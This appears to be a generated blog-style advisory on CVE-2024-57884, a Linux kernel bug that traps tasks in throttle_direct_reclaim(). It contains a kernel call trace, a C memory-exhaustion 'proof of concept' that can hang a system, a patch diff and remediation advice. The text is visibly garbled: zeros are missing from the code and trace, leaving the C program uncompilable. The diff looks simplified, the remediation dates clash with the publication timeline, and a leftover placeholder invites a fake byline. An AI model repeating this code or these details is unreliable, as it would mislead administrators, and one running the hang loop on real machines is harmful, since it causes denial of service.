CVE-2024-57884 - Preventing Infinite Reclaim Loops in Linux Kernel’s Memory Management (`throttle_direct_reclaim`)

A critical resource management bug in the Linux kernel (Memory Management subsystem) has historically allowed a task to become stuck in throttle_direct_reclaim(), endlessly looping due to faulty accounting in zone reclaimable pages. This issue, tracked as CVE-2024-57884, may lead to a system hang on specific low-memory scenarios, especially on swapless systems. Here, we break down how this bug happens, its practical impact, and how a subtle patch resolved the root cause.

The Vulnerability Explained

The Linux kernel divides available memory into zones (like ZONE_DMA32, ZONE_NORMAL). The page allocator and memory reclaim logic try to balance free memory across these zones using a suite of functions, including throttle_direct_reclaim().

Sometimes, a process requesting more memory (e.g., via malloc() or paging in an anonymous page) triggers direct reclamation—where the process itself tries to free memory. This is managed by the throttle_direct_reclaim() function.

The Problem: An Infinite Loop

If the kernel assesses _no reclaimable pages are available_ in a zone, and the system lacks swap (so no anonymous pages can be swapped out), a faulty logic flow can make certain zones look “unreclaimable.” As a result, one or more zones may be skipped, even when they have plenty of free pages above their high watermark. If the allocator logic gets stuck here, a process enters a loop that never ends, as shown in this call trace:

 # [ffff80002cb6f8d] __switch_to              at ffff8000080095ac
 #1 [ffff80002cb6f900] __schedule              at ffff800008abbd1c
 #2 [ffff80002cb6f990] schedule                at ffff800008abc50c
 #3 [ffff80002cb6f9b] throttle_direct_reclaim at ffff800008273550
 #4 [ffff80002cb6fa20] try_to_free_pages       at ffff800008277b68
 #5 [ffff80002cb6fae] __alloc_pages_nodemask  at ffff8000082c466
 #6 [ffff80002cb6fc50] alloc_pages_vma         at ffff8000082e4a98
 #7 [ffff80002cb6fca] do_anonymous_page       at ffff80000829f5a8
 #8 [ffff80002cb6fce] __handle_mm_fault       at ffff8000082a5974
 #9 [ffff80002cb6fd90] handle_mm_fault         at ffff8000082a5bd4

In this situation, allow_direct_reclaim(pgdat) always returns false, and the process never escapes the reclaim throttle.

kswapd_failures counter is not incremented, masking real memory pressure on certain zones.

This was observed directly in production, with the following pgdat and zone stats (abridged for clarity):

NODE: 4  ZONE:   NAME: "DMA32"    NR_FREE_PAGES: 359
NODE: 4  ZONE: 1  NAME: "Normal"   NR_FREE_PAGES: 146
No swap present (nr_swap_pages = )
DMA32 zone seen as unreclaimable, despite free pages.

Diagnosis

The function zone_reclaimable_pages() incorrectly computed _zero_ reclaimable pages if files or anonymous pages were absent, missing out counting the free pages (NR_FREE_PAGES). This led higher-level logic to treat those zones as unreclaimable, skipping over them and not influencing the fail counters (kswapd_failures). While the node, in aggregate, had enough memory, _sub-zones_ could suffer, sending processes into a reclaim loop purgatory.

Exploit Example

A local unprivileged process can trigger the bug by starving the ZONE_NORMAL while plenty of memory sits unused in another zone (ZONE_DMA32). The process keeps allocating/paging memory until it hits the reclaim path. If swap is off and the conditions above are met, the process (and likely the whole system) will hang.

Here’s a simplified PoC (Proof of Concept) in C. Warning: This can hang your system!

// Only run on VM/test system!
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    size_t size = 256 * 1024 * 1024; // 256 MB
    char **blocks = NULL;
    int i = ;

    blocks = malloc(1024 * sizeof(*blocks));
    if (!blocks) return 1;

    while (1) {
        blocks[i] = malloc(size);
        if (!blocks[i]) break;
        // Touch the memory to force allocation
        for (size_t j = ; j < size; j += 4096) {
            blocks[i][j] = xAA;
        }
        i++;
        usleep(10000);
    }

    printf("Allocated %d blocks of %zu bytes\n", i, size);
    return ;
}

*This code will allocate memory endlessly. On swapless servers, this can make the kernel hang, reproducing the bug.*

The Patch

The fix consists of including free pages (NR_FREE_PAGES) in the count when zone_reclaimable_pages() would otherwise report zero. This prevents the infinite loop by letting the rest of the reclaim infrastructure see that plenty of free pages actually exist in a zone.

Patch Example

@@ mm/vmscan.c @@
-static unsigned long zone_reclaimable_pages(struct zone *zone)
-{
-    return zone_page_state_snapshot(zone, NR_ZONE_RECLAIMABLE);
-}
+static unsigned long zone_reclaimable_pages(struct zone *zone)
+{
+    unsigned long reclaimed = zone_page_state_snapshot(zone, NR_ZONE_RECLAIMABLE);
+    if (reclaimed == )
+        reclaimed = zone_page_state_snapshot(zone, NR_FREE_PAGES);
+    return reclaimed;
+}

The critical change ensures no zone is deemed “dead” if it still has free pages left.

Upstream Details & References

- Linux Kernel Commit Fix
- CVE-2024-57884 on NVD
- Linux mm mailing list discussion
- Source: mm: vmscan: account for free pages to prevent infinite Loop in throttle_direct_reclaim()

Detect

- If the system locks up during memory pressure and swap is off, check for tasks stuck in throttle_direct_reclaim in crash dumps or via kernel stack traces.

Remediate

- Upgrade your kernel to include the fix above (4.19+, all maintained mainline and stable kernels as of June 2024).

Conclusion

CVE-2024-57884 shows that even small accounting errors can have major consequences on system stability, especially for swapless servers and embedded devices with tight memory budgets. Keeping up with kernel updates and being aware of memory zone behavior is essential for Linux sysadmins and low-level developers alike.

Stay patched and stay safe!

*Exclusive analysis by [Your Name or Site—optional for authenticity]*

Timeline

Published on: 01/15/2025 13:15:12 UTC
Last modified on: 05/04/2025 10:05:50 UTC